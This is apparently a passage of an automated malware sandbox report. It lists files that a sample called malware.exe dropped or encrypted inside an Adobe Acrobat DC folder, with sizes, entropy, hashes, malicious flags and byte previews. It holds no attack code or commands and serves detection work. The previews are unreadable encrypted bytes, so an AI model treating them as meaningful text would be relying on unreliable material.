                        Preview:....!..K.Gp..}b._n.q.t|....z.P.x..&.vA>./)......9?|D.S....@[.u".}.=.4.C.DG?.....~.]$d.;.;./...W...p1...!.pr..Z....V..rHF..).q.....I.IB.{x..y.B..A...........[.!.By%.....M,..7.+_5]Mn.....L$ ..m.0..$S.-~..........70-..d.(.`&.K.U..]v......9...V...I...2g....lNM.x%.....C.*.[8J.. Qh.uUfM......F.a.....}..b..U~...*r..m0=.... 5/...Jf.S...e....9-.uj..9..(35...lD&.Jd8.......]..*.....O2.P.Q4.....?...`R..se|D...(5.<...]C.a...9....".Tc(..&0.Hm..s..Q..MpG.....D..D).........d....j3...../.a.<......2....4...w..O....f....).m.|%.tvr...H..G.....Y..e.I.X..=XP.9...Q..0.)..n.....*.U....."..e.F..F.f.~.R.,....~.-e..~....(\o....&.s.3H.q......b.L.,yr..,.R..+.2..,0....O_.H....I]....VZ..D..O....>t..u.WgMY..ql.MK<z.v.x.X...-.J..C.3G{%...e<...;RuM..u.....g._i*VT...(.<WBc..i".R..f%R7..A.i....x.c.....j...._....Hkh6.f.l...L.!.V......X..a%=..H-.....HOw<.<g.v#.......5.'./...Bj.t..Imt.`.(.....R.cR.z...v....=....Bn.p`...T|...l...#....D@..e......P.c..K.)..j...s.DJ..U..........I....W}...<.jv~

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\Microsoft.VCLibs.x86.14.00.appx

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):612616
                        Entropy (8bit):7.999661256434388
                        Encrypted:true
                        SSDEEP:12288:NEnZseqnt3szoJvQSXYzxEX3YLY774ckfOPK3k7s4pGxoqlV4:NEn2eJoJto1g3YLY7c+K3kIR4
                        MD5:854B74A92D9C74FE5F98C1403B8F4D44
                        SHA1:256367820A9C97B87DC5F7477F5AB96217AADEA3
                        SHA-256:F9FDF1D3F09BECA4F2DF2EF2AC649945ADBEC8D2088B9C4E81FC75338700987C
                        SHA-512:C242E44EA3332A9C9624FBDA584B0590D05AE560506CB0A22276C8787E3C243B4FD466A4979FA4DFC765D3A758C91DBBF3CF4B3F6F4A3462BC2CB838F276EEF8
                        Malicious:true
                        Preview:.E@........O..S.T.aueozM.#V@Sx=.eE.'a.x..Z...l.)e....>]....t.T.;.J1.f.9.....E.(e.x..bu.....Y..j....../..L....5.\...1.{g..%..:...<-..VN.D.)Y...."..~.yJ..`..}n=...72.$.i.|51}......Q.=P....&.mepY...Y9.-.pq';..&.../..%+,z.RgL%.3y...............H....D...l.:.&(.....y.....F...../...9....6C_.p....o.!......P.....G.Zz..y.sx.T.69.._V/....=dXC...p.Rs.\C.<...#..m!.-...$9..VI.S..ae.sJ.e....."..L.]W..:......h[..j...k...1'...+."b2..B.../.z..+..e.c.i..d.xW..."..~K..sy...'L`.0..&.W..k..$-5h.(..u..0+.].....{6D.1....M.oGW.IW.g....b..oy.h..Y...#....v...b.5r...1..Om-..:.$z..........K!....5.:.).r.g....*nG... .....]...].....0.W.....+fm.%.D5..y........b.`.z..Ez.e.1.Nh.\#*..\.o...?...&...t0..v[......fM."......#..p....f..n.Y-.?'Pv.(i....n.G.J...t!.5...x.c..B...$1..}......f..[u.s..g.....<.ut..N........:..9.:..u....'......v>.o..""......Th5i..c......\...l.J.......r...s..?......u..#.....[.....;...Es+..\.+..6V..HK..sB..(.tB~.2..8.....X.....Z...NS..?Y....%....[n..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\RDCNotificationClient.appx

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1824926
                        Entropy (8bit):7.875329162008233
                        Encrypted:false
                        SSDEEP:49152:qgeV+jcwaQj/5wxuaOXRahGDn3BJ2OQd1pLo62E9tCkt:qgjcfAvXRahGNJbQd1pNh
                        MD5:6358A65BC8D4979C80206D7AD5A3EB95
                        SHA1:8549E87BE2B28232D766812230D2A5CAE262B596
                        SHA-256:E13B7F03411E46CA92DAAB2FE8E9EDB5B40DC9042D6E26D86B726E3B06399DCC
                        SHA-512:027CA9A4FBCE43559BE70D584754816CB52EB438B4882255D7059C2964E00EC4243935CBC716D17D6B7325155E49FD46D804A2337E1DD8C3A1218253CB75566B
                        Malicious:false
                        Preview:JP...>..:....d..S...t.49..>yb-ye...~.!A..u."..B.?bt.T.......Cx..F..9. +$.#5..Er.2.&[...=.....xy).L...G.i.n...%....:..._....KA.I.l.K.5.Ols.Ci.....m.Q.".Gk...La)d{.\...W.l...'..%.s...`.4c..i.^k.. ....."qX....z.C#51M.D..f.(.z...X}..M.L6f~(.k..*.>..E.Q.......1k.......,./.|C..$P6a...Q..+....A.3....r.w...M.:..A2..x...wn.g...:mF#|..0d....b%1H}....],..3db..[.Z.Rb....AQ../2.l.X.s.f......k.....E..o..0Q..C.i....q...<\.^.c...Z?....v& .3..0..f..h.b9.m..u-.S.8.`...mqY..2......nW...G....0\u....!.NB.....J. . ..9.T...=......1.#..|...&.f.LD.G.^ .w..u.b ...J/.08..:...0O,.}.@z..]#..m.......E..<W..C.4K..b.P..%`.3..Y...n..h........0=.......+...A4., ?=....w.!b.......Z...y..e....d..ON.c._..+.}...l6.]X.F..%...Ob.J9.>.v.;...yp!...._..g.Lg.4G.../\_.Uw..v.1....0...e9..kg@.....gDK.>2.)N(...S.....nLd..u.Yl.?.......($JnC.4...R.f.urQ.Y...@....W....*v...zzZ1n.S.......n..D;...p=.p..Sf.....R.4M;e....zMb.%. ...j.4..4..2.bIK...o.7....FQ.h.....!.....o.IiqAQ..l.!.,<.-...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\Comments.aapp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20432
                        Entropy (8bit):7.991775499652051
                        Encrypted:true
                        SSDEEP:384:86bUPtXJyq82YKdVZQIRGQsNqj8JCiJGSvyOgm70ikOYZMbrKZ:8HdYq82YeVZQ5QszGhOUOGsW
                        MD5:22EEDDC188585886F81ABA3C5F056A87
                        SHA1:0BA5674122ADE21B91E43F3642011CC6B9A9846B
                        SHA-256:3EC570D188FC1F1DB640D9FC170BF7DBE7B8AEC3A8D765E4B6F14C12072ABD35
                        SHA-512:450CC784D8835E83EDAF8935FDEADC773A6D1FBD6B4D63ECF76994250EEF13702DEFB48B69B8E07525FD9092AEE6EA6B63E88A029FBCB9999464D413CBEDE07F
                        Malicious:true
                        Preview:.m..t.3.y..v.....J.[q.NQ$....Y....4..u.......-.afVo..Fp>.>5!.5.x...;....'.B^#v;..L.t.g.X...Z...m.Z...]Th..=[..f.qij.....N<...m..Q5......?+.k......(..{x"W}-..\............u7....W,G0.Y.<.S}.".>_5}~<>!....$...AB.?+k.$..h.0^E(......Q....._.......(lK.Hu..x...S.{O.=....Y.X......@.Q..z]"..S.k.ek.A.n.T...OX..... .gx(\i........$nL..M-.-......u....<.....B{l.G..Iy.G.b.....k.......8..'KX=WhLt...F.M....s.....#KhA../....i...7...n{...\...;g^`2..o.$...q.R..Y.I$..Y..bd.....%..O...q.T.%.e....s...m4k.F."A# &...p_..f...O......9..Q{. !.C.X.~.2.SS}X..&..u`.<)..(7F...R...*Zt....N...}HM.c*C4......X.@..u.'.p..u.RA.&."..1A...Oz.W .Z.$f...V.x.8t..m...m..4J..+..{....\!.[...b.y...."..\...$....(..xd5._b.o./.h....F@.S.....^....2I...Z..fo./.......XH..O.....^.s...%.......8f...Gx..vdyO.!Z.4..d..\.....;D)sV.p.....EG....g..i.=.I.......@OH.. ....K..g4.].U...}{'g!nAjQ..}a...w.....JA......n...XKx...'}....I.^.b.:...4.B..A.oV5.&)~.W...b.3?9.R..u...\zA...a....T.t........~.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\FillSign.aapp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10905
                        Entropy (8bit):7.98328278811552
                        Encrypted:false
                        SSDEEP:192:ijEOAaBDbQnTBOPlhMsmt6xQyiBzV5BGw/rYTzvE8hlKMfaEZLeUEob77BtN:vn4bQnTYPTY6xMzV+w/rt3Mfari1
                        MD5:870C3618643E4CB956C556599B7B8984
                        SHA1:A2C37ABB2CC48EF32ED50007EBFB7C45BB4F4323
                        SHA-256:112586C0891B4FBF861913349E2E461FCBB02A224ED09875D3A60DB032A626D3
                        SHA-512:2B7BD91C2148BBCE519D566C8D0B8E1056E8FF8A31E8E1BFEB0C2AB07E2F6DBB2F5C06E579C3D3C8031BC0E1C4022C4D9712A832567517B4AB3EFFF3AC4D4E33
                        Malicious:false
                        Preview:i'..8 .%.v..i.#...B..&.....e.?..V.?....(..2F.;.'.%.U`b.`..6..x...ad.qtr.t.h.]..G.0....L.-.......,:0..e..j..L.X.G.\i...t....Q..>~.R[..../I...F.....V..u..Dcch..$./^&.a.!.5=zE..ME/..d.^.........C.t..H.+.....T..L....+/.Ie.@...3..Jl..9....+u.....I....D$d...f.<.S.Z......h..R,-..N...}..P@.n$f..EO....$...s..w.VF.r.N....RVV$.....xr1....7...0.q..U......Z.v}.l23...bt(..*aU...VJHl&.]...3~<..H.|.Z.'.t..y.........i.,N.-0t...&P.>...,qv(..R.41|.]..oTby..3.IW....K..2.,..M..+i.t..$...=q..{.!)..>..n0....a'.f."/.y*...j..Q...ME.E.$.U..4...A...l`...I:.V4.......tdN....h...z..DV6,..0x....'....-..c$H.E!A..-:X.+.......R.....K/@u5..._G........T....)te.H.........w..T}...eS....O_o.0$.**......(.c...4+.).5.*e..:..o....(....=.....B.O8C?{..b?D..>....,..p;XjI&....u...p..^l.,.wc.T./......10.....b8%N..?...y..w.L .0..t.(..A..E.8.{p&),..b.Me..wy.LY..89Z..t...IW........P.9..A..T+.?..j.Z..n[....FJ...-w@........".........Cz./..(Z1..&$ue./.M~.0vv.,m.....0.0o.4/Dh......]2...y.~..jGK..1k)....Q

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\main.css

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12038
                        Entropy (8bit):7.984298840595901
                        Encrypted:false
                        SSDEEP:192:0K0Oyn4xJa2plVN6Xqw8r/66vO9hWEPS8HeOt5rOoHu0H1HlwGP6Mf3:l0Nn4xzpboqw8j66mhW78tP7BYS
                        MD5:65EEC2CFC849C36CAD2178B0124F8539
                        SHA1:15A7DD29F9C7B0E2770D2D5FDB17476CD142A86E
                        SHA-256:933B0536BCF44D0F56872456D96F164B32C76FD46896E2CEE30D57943652D467
                        SHA-512:A9E7FC8780B753755F8D01E86DFEFAD66A98AEF1668EBDB8A250173C18CED173767120E5DF57AEA5541C326F79D20F828B5A5D9DBB8322F2EA6B0ED2D9DCC636
                        Malicious:false
                        Preview:s]N.wX.?..xc........U.C1a..B...jb.&..`\..........)...wCx6.U.....E.>h.wT!...9..S.,w..p.4...^....b=......MA}$..................O...x .G..+....&..D....vs..Q..~...T1...2....S;...(h.f..N.._..dFPmm.+.r.4....5..h.`q+.a.l.s...~.7......=7.Rz...0..Gx...ug..C....e...q.]....Lx%...... ..6......j.F).7*L#..........\...y.v3.?........c|$.W.).h.k.}*{*..s..5.1.0'k..l...GoTUd..E..r../=.3....K.....e..........wP...8.?......]...:.y...$.......eXE.j...]U.Mo.....z.4.....!.e.e.#e....'..aE....2....$.f..6..d.;..C..4..+4.aS....L.1>.z..$...S<.3D..<c...#5o..5-*....6.K.?.....g8.......,!....>..H.3.ED.>.J..a1._...t.z,j....U..{......k...s...../.]5..f.T.bq.n.r.._.......O.4.....pp...9.M........x.>.....uK..6 ..<W!(.-...f..P.p..H.1..G...@\...-.....!.-....01..PN...?......Y._;N.......E..:...[...@.1.S..i.....^.3vgS...p.K.........7M{IW..q2j...k,..y/"..m.l..".1.H...sTuw...s<....<R(......4.,....(.{...s?...A.......t..}m...J.v=.F....r.}..A\.E.}.x.845R..mO...@[...f.B?...."{.D.M?.8Lo.=.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-app-launcher.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):461209
                        Entropy (8bit):7.998234455619368
                        Encrypted:true
                        SSDEEP:12288:PD2IZz8LUZxgcvWwm1OpItlaoMu/uc+DJ/rV9lBICGJ4h9w:SIZGWxDOHtMWuRl/zl6XU9w
                        MD5:C044BEB9FBBB499EA29AEF49088B4E17
                        SHA1:F8A59223F28C9079133D6E39D92D046A4E6E9271
                        SHA-256:A6CD3050CC45082F8EEA5D9B29AC2B6A77BE9165AF04BAA0A3E7308496AB2611
                        SHA-512:B9DF72937DA578E742A3296D9B01675AEFF6F616B040213AE534E296EAF344CD574D0F406B3C0018BCB22882395ACD0A914D9C11A8F1F61907C02F16C4619F0D
                        Malicious:true
                        Preview:H.Ph..g.o.).(...........p......|NW.A.......0.@.....~8.|..GbFx`]..C.ty...P.}..b6.:.2F>.IlG.V.]0..3..._Fl.m...N..P(p9...K(mX.. .".&..p.n.~.M.....A.."..L0.........;...(@o.....\...9..~....uy.yE.g.FK.......3..s....T.....C....t.}!....\?..~x....N..).....e..*....i.s(."LI.re.v.....g.QHE..!...XU*.M..xCH+..'9[3....T:.w.".=<.c.$..b.<*...x..;.#..2........o.d...Q....-.s".O............. ..2.Q....k.n..YOf...>....T..".....D.YwCB...|..v{Jfa0.#...v.:.!K.^..'.q.q.K..^.J.ig.qp..8.!..'....6........{-..s.Z.V....l.~..vB#..s)....1.5..U..):.<a..s...:;...D..]..P....k.tq...%....:d..ZF1^......^.]..v..f.....v.......|.(i..PGV.&f..\.g.=..&e...L..-..g.$....(..B$V..]+..}.~..g..*....n..6.*is 0.g.....;.-.g...U..u.G.2M!......4..._....p..O.Q.......4..ho$....).g....O........x...=mN.....y..p^x..c......w8<.Uy.x.ZQ..)SC.... ..R.y..5?0..%....CWx....Pn.......~p..c.8..).0....jk..0.~.4....`..Zz.XJ..<..>.=.b..-.E..5..Lp...\.....*5.......n.."~.].N..!..gt&.<...rR...h.`..EN.Z.L

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\04ddbdff6396d98807bc0b6a4af1938c.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20641
                        Entropy (8bit):7.990528094083738
                        Encrypted:true
                        SSDEEP:384:vgNImzzgHrqBpA2io3jBa6dQUw0bfN3GXHO2k6oKcj7ss:Ihi8AB4Jd5l2XO2k6oKcj7ss
                        MD5:1EB9783C3556A77F4A5959686341EDDE
                        SHA1:49F6C793F21B2AD79FC4692B9EBD22A998E47E7D
                        SHA-256:5ADB34E0DC820C6B4CB92ECBE411DFAA7D16215237B0454080177F44C83F86A5
                        SHA-512:7B752EA67FA3C22704976697F81912224920F866084052F6BA9A02DC14F065913898F560A02393D6B65CCC39DA3B1F479568E29E0D661565D7633E46EECE9664
                        Malicious:true
                        Preview:..Vu,........|.1g<.....!:X}`....a..9..S.G.lf]..a.........3x..'a.<.OA....k...2...r..M.s..`.Z..}:.....6.s.......p.....0f..j7 ..^..^/.1c.........`J.E.......<..Y....2.8w.....G| ..:%X.|..WV.t./.k.u6.......hz8.p.v.$..o.9..\.....P.i/2U/....."o..D.n.6....v.p.....W.Bf...g51.Ba.B|..O...Qfp..!.xV...z.Cz.....EIZ.9.Im.(...{..c./..~FH.K.+U./.3.....R...o.g..7.....Q4...._?.-..^..Q.3.`n.D.h...n......U.x..P7.zL.....v.76."~.Oe....Z...jc...d_.........`LS.....K.`.9/9.$.k.j..+.xsO{k..CpMiZ+C...Q<......7.e<.R..r....qP.]..#I<P..}QiP...H....d..=.9v..........1..:V.@.>..it@.......6.]X".<k$.g7.H..........|.!*.}..w...P.go}X..9..R5..Wh..Yk.5...}.u.N.....!..Ie/...u.<-..%W."..T......u!D...J....e....R...+.n.j..x....u..y.t..v...@A........V..s..K.Vu..w.`.Ba|.m.Ls..7U.4.A.R.y>.CH.>84W...g ......a...._O9....(}G8.......c..8..x.....u=%..Vq...U.x.|F..s...%...r.f&.........}WkD.2.d.5.V.e....`.x.f..Z..c0.2M......C^A...._.3.....O)DB.BZlA./i..0Q"q.%...Dg0......T8r..........n7S~...M.5.>

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\071c3429d4900e9a5c0d4e2105ccf1c2.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11837
                        Entropy (8bit):7.98524641215705
                        Encrypted:false
                        SSDEEP:192:H66GZ50V9gKQiCwz+3DNANX5Le4SZdnEHRdu7OgvqIO95HVQgjxM3NFV2K0r9aNM:H66d5QiCwqSN5wURgtqIO6gm3Nv2KU2M
                        MD5:1679D36D06ECA4F29C91767AC1684478
                        SHA1:042A49A515E71A7207CFF0D72F5664A1D56D0088
                        SHA-256:52E47E7AAD6AFD4CB6DBD6EA025B6EE9A9846F2E811F81955B068FDAC1FDF7E6
                        SHA-512:FD76600EC1BC9DC572608C3175849484418DDF9F3377B92B1353032891CF01E56E614B25DA8C2DF28F60428EE7C45114520BC46813F93E1727087AB7A8D5867B
                        Malicious:false
                        Preview:(..05...}..Mbz..h...i..,5..6..N.'......f.ip+...#.....;.I.....&Phl.n..j.|.....>...l..a.W....HH.H........v.hT..L..g.M..../..j..JA.$Z..z...f.O...j.....m.s.......m^..S..5...=_!K_x/.!.%....v..F..e.w...K...r.F7\............{.]..?.T,..8UMAa..|td;..K.e.Z`....8......h....`6...M5...6..6.2f..e....AT.UQk....57..$[>....j..r.h5.:/...^x..J_.U.ew..(#!.0....f.L6K@S.c...&.o...fQx../....>@b....l.p..2.j..e...nf.....>p... ..$.......M..G..Mj2.....w.P|./._Z..UF?.]V.T.%.r.../.k.\....6d...'.~.0......-..8.u..Wv...7#J........?..X7M.U...8..Y.4N.QZw.A.3..)...'.Tz.i..)...l...H.3m....b..vc.. x....~'...!#.....(.M.iI..Y...G.L3.....;..d..r...be./c.Wl.......p..6.[...^|...`.*./~S5O.P.#..xj{...].. .F..\Y&.5/t..~=..B.e........^..|J#..H. ,..O....4...t..j2..@<.5h]..e.....<.[L...!y.p.&A.9..!....j_..x.E.>\dk>.i...3p....A.@.M:.%A?.H.....|O...P.S....fT.U...61.{....b.6 ....#(.8.0.Fc.2.k.I)...|.9....&...~}9G.M..N...k....D........F....w.....L.rY~....w...\EQ......Yv^R......W].}4......%..W.Y

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\0c9bbbe7a01f43c8a2c084d4926a8785.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):164565
                        Entropy (8bit):7.998997910219108
                        Encrypted:true
                        SSDEEP:3072:33LyAcOhLdrjEycwVWsn7f8MIPSwrRJVc66Jtdxvcb:HrNdrjfWs7EMbEVcFHLm
                        MD5:DE49419FF2CAC21510917C278DF8F931
                        SHA1:92CA8FBC4BA483CDE6C868146EED727860E2BF33
                        SHA-256:ED3AEAC4BD7D13988291BAFE56DB2D0FC08808CD6B11DC964A837AB4F5975858
                        SHA-512:92E38B94DCF9653A1986E55C75AB8F837D5DCC1DC129B157C831461CD3918B723ABC5A54697C83BDA163953C1C39F222C119B35822A0BF6376103874CF3792F0
                        Malicious:true
                        Preview:e.GF,q......@<~.J2.f. ...4C.......r..`.9I.._3..n...1...H..,..6.*..U..).p...b.+=..+.....k....>.....<.]|.1f..5.....B.!Mk...]f.....V..;....c..+V.m.rl..80c.V.M.S>.;... l..X0s..G...yP.d...^.y.\!K.[.d.v......$...l..bW;.'.vTuL.+)../..@5....[.8.U1..U..N7W......j"y...>;_..oT\.+as..sG...f.g..<...p.g.;.s.^]c!..!..|:i..Q<..h.B.........s.{..m.C..t.....~T..].7N..F...+.l.....G.3R...........x.....+v.w.Cm..;........6.H..K...K.FU.E.X....|j..A7.....``..mN0....3..}.U.4..'GoZ..6.t.M........-.i.....lu4z=!$....5.e./<...&.I..L..O.K.7q...f...+'..8M..tr...........@Z#..]...3|.h...d.s1..........?..4.A...Io_.;j..H.L.H...p..).B......yY...c...:.<:.....Q..8....3#...Q.$...(....yP.2.=..x.h...tx......P.a...B.b..E..d.......O......Q..U...e.!..J..D..fqU9!..'"..F@.....P.D.>n....8H....@z.b..t...N....fS.d..(...../1"/......... _.*u.v.ToH...Q(..V.!.m.g.k..+.u........sc...V...]DnZ.?..W(....?......H!..>(....Y..q.....G.j.|.+>.....3SE.wK0...t......../...@.FN...~...g.b

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\179f135ab98d015965571a3d585f8c8f.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64736
                        Entropy (8bit):7.997380765581654
                        Encrypted:true
                        SSDEEP:1536:Wd+azY/S6RqfueEKvEgAfa8TKq3p9Br0O9Jvi8IQEVrv18xc7:Wd+SY/CvJvCfZVproaiok8xq
                        MD5:EE875D23A8B398763E349AA5462B86A8
                        SHA1:4D1F55E988100FCE2738A6F0EDA9A806611A782A
                        SHA-256:55BA1C5C794E95634DFA5A21FE780793EEA9C8C7C42E9CD2F2D4CF7B63F62219
                        SHA-512:552A3CA4BA046159311437D8BA7FF06CAF6C741934980D090838D1E2789C196BE2BA5C9BC6AFD0938795F2AD3146D9C34505E48FEADEF2A82592A76E9E2A6254
                        Malicious:true
                        Preview:\.]..&'S...b.oa.iW[......s.T..rU...E...ITK..|q..1..;..`G...L.. .P..a..w.*.0'R.o_i{J........;...4p..9H'C.Vl ..C........G..Buh..)......#y....Z...S..:Iz..?).@..F*..k"bW...c...E.\..X.>..6.......k.r,j..e. ......4.I.e...+...Am.H.VU..c.M..>i.;.n............ ge...K~..&.S.Zj....!..l@.N:o..D..p#.i..A/.Ws.........dX..b.....dr...IX.c...W.W....k.\Q.C..=b..'m..ej.A..hX,+..:......h.........4|]Xj.6.+...vR.`....>"h.!i........8o:l...p. .NJ...L.?.....l.:.i...!.........X"X..h...!...*..A..t.,.+ .^.......$.f.....".LR5...GDJ....M'..NY..0Gn..n.f"C...):......T.....2..v..^.. ....*...../......V..q.....Y...3P.BERL.Ow6..#k..>q..A.ta.c.,..L....}z./.p.Z..6r...a ..k,.#..I....z......(...;..z.;,...Lc ......%...._m.}a....".9....U].|..[....zSfZ||.\.I.3.I!.......s.p.._.Um.3.......1.....pK.@.n.6?.y]:5.5+...^........O6..c.)@..:..Q....Ra..x.o.......U..w_e.W.w`.Fd2-..q...._....^.*Y.R....N...o.g..J.z.y=.Z.r1.T....#......Y..}....qM.S..R.X.....r.R;1..M......{..xws....x...O..rI.<e..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\1901-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):23226
                        Entropy (8bit):7.991577239282716
                        Encrypted:true
                        SSDEEP:384:f+pziC0zpz/wjAnfC+aNrfSlrgdph/MAfT0UW7quqCajQL+9LZtsIPv:f830Fzo4efSl0dpCuTMq/8LMLZDPv
                        MD5:C62078FF096F75321DE364F9E6E409B3
                        SHA1:A29D405DC1F8CE48354F4E42964A9A12F86FB26C
                        SHA-256:7DC5AE51DACBC508D0E139AC9A8272BE775899288411F89971661B72E5AB1E39
                        SHA-512:ACF2ED49DCE3F0D58918591B50A170786D557BF0A81E48D0CCCF3E61B06CEB3A42C081A187410CDE6D7C9B4814FF5A4B68B3E1DB744370426716B631D0AA3967
                        Malicious:true
                        Preview:.c%x....L.L.q..TO...VD..b5....m(..N..y...N.(c.......]8..K.9.>.EtZ *...T....Z...r..*..?....b0...z..F!..Lw^.4.4.{3.vA....W.......8.e<.cb..^!.:......M.hx{7..k.y....r..i... .K].........CL...A..5......^.4WX...wW.Q.E0Kp..)U..||....B.G.....$.j...1|..=T..n.]4./..t.b.Yd.+$.\S.4..t...Vy....R..c..V........9....xA..>..T..1.v..E..,...5.NG@.....Y..A.T...D.8?$....w....B.Q..2..''@S../.y..+..4:O...}...Qi.-......s[..td.<...x&.u5...d.8S...{Z.c..TRGM^..-.N....%.0.M.E.Q....Y..D...'....\.#.. D4..Q........y.#.iC....B.y..S.'.1.Q.x7..).;.R..H....4.e..@.....?.3cu...<w.Z...h.90.\.*)....2}.Ky[.H...2xV.=:r.Sf.D.C.>.Y..9....U.......I'...?..Y.|Q...m.ir...I.PK.wM7......s7t.z.n..h.....eQ.E?.Gqa...+sq.S...6..-.3.C...T..|.....7.jj..1.}.0t@`C?b.....<...H6.:....\...Z.B..eFj-'.YF..|0....r..BJ.6....9.e...s.|..3.~..."_....Np..k..X.....K.B..ps+.R..r.5FE....m.5..9..co.r.].g.L....(2....hSh.{1.<M.z.1=....{p..)]...`z...Ca..1.F.../.S....f..z..KzB.,W....bJ_V.~...A.y|..z.P...q

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\1911-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):43406
                        Entropy (8bit):7.995722330407931
                        Encrypted:true
                        SSDEEP:768:R/fnF5jcTplfphA8fMs+HJjwMtyG6slHUQMMOAtvrgnPi9hmOMW+1jMaOD5Ez6n3:n5IT9haHJUpGTdMydgnPtW+1jM7OKB
                        MD5:ACF3C271E6ECA95D52C73DE73CCF1834
                        SHA1:5CF884DA00DE3A88665D39481B0FE0019C6BAC31
                        SHA-256:5039CC7BAB51653791C920D566D9316943C0B163F21F7AF29EC73E7B35ADE6C3
                        SHA-512:3DC3D1AC87AD0DEEE33FCF749925DA430DE513CD3AEF0339FC4B45478E8FA27FA102BE89A98BC978A19D864E8CE95BE6CE640295677FD3718EC8C10B5BC69191
                        Malicious:true
                        Preview:j`..nu....z{...........3.p..(.k..h....:ll.....}p.^...-A.?...n+...2.k....F<...<Q..Z...pP...O......y..i"....'d`.,...S7..{.....*.I...l.._...<.3..i....'..z ..".}....k?.W....D.Y.j"...N....F....}D.,.uZOg.qa..j.f..t.s......%.0...A*...x.Vn..j:.K......)rF...O..9A7H[...... .Q.-?......~iL..T.?../<........W.]d....Kkz....} ...\1SwQ{....3.-7l.=..7..@........ K....$X.}.}.c,..?......"6..Q..iI...~..({a.....KC..M...$...].7.{.[.w.1.U.|.z.3..U/.0.{q.f..A5N%......S..1..&..jx.gP@I-)b.Qd#.lr...u.L......L.C..j.f.C`.t....8..b...D........6.~.. ..k...........R.e.#.B%1.C.....ho/....P".....j...P9.....5.w1...&..s..m...MW..;..d/^..s.'...'../.W.a.a."..........v.USD^...q..A@..O.h~.4.l...g+.F.."..S....1."...B....d..&.....k.Xo.B.C.tnNj..u..f..U..` \,/JI.c...y....l..A).......?....0...S.....C>..i7..[....r...._K?..\..2.,..-......w..l..Nw.~w....h.?7......E=&.r.......(FJ....!.~.8.OD~8d.[v..v...T..T ...G.=`.C0.w....nS.l.P.....x..L4.......S.@...E.....<....[...;.Z...l...Cz>..Cs..?

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\1b4bf50844144c4d25af0802a87bfcc6.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12968
                        Entropy (8bit):7.985306952467702
                        Encrypted:false
                        SSDEEP:384:uL91BGx8dXCeEQhf2MflFdeQuaW7cYnjMWo4rs:wBjvRh1lreQuaW/vo4rs
                        MD5:537AC59DCC960DB1A2945726FEFA7102
                        SHA1:437D1F28FDC1EAD4601951293A7A52C7EEF05948
                        SHA-256:DDCC2AD47CCF66046E4C77AB1BD3246C6412D53CD032AA5A80D191AFEF8D8231
                        SHA-512:18EB9F406E243A99948B4B9FB93EF5DAE0244DDA33B793E6B288EB5383BD9493FEBA8D70F99DF95E6B8D0457E121772F3888D1B75F6B10C0D914A7857EA52D7D
                        Malicious:false
                        Preview:..00.a.....Hn%,.5...d.\.K.v..u....A.d..<.....bd4..K_^.U....ah=.eJ.c....m..m..n...~......Dr....i|.h....*F."..\.?....S*RX.....N.....!..}..G.....Cs.....6.....w.... v.S1.........,.......|..O.4{6..+.i...a..P..n...3.4.N..$....$C........}O.......z.Q<.d..9..zl.....{...o.YE..mt.j..P.;..4Z..z.n..n."......zr.2.f..\g&.....)?<.CC..[J&...~V....!!.T.....y.....x..z.x.k&.~5..F..........[.~{...V..7../?....m=C9j.dq:...X.0.D.....X@-..F.......&....C.s..I+.[..}y....N............0....E3..O..U2.'\MN..j.....W.b3.H}.pe..9.x...u.z...t3<.t.t6Z .M.m..Qt}A..4.:Ii]......]).*..I.....s.h.A.+<...h.2."..).....f>S<..K..V...p.d-....#.?^T.,....2...|*.:c....5..i........R...a..PQ x}D...+G....|{.jqV1._.0.[...0...........6@d..]...dBn...}%.:S".id...=Q6...(.S. 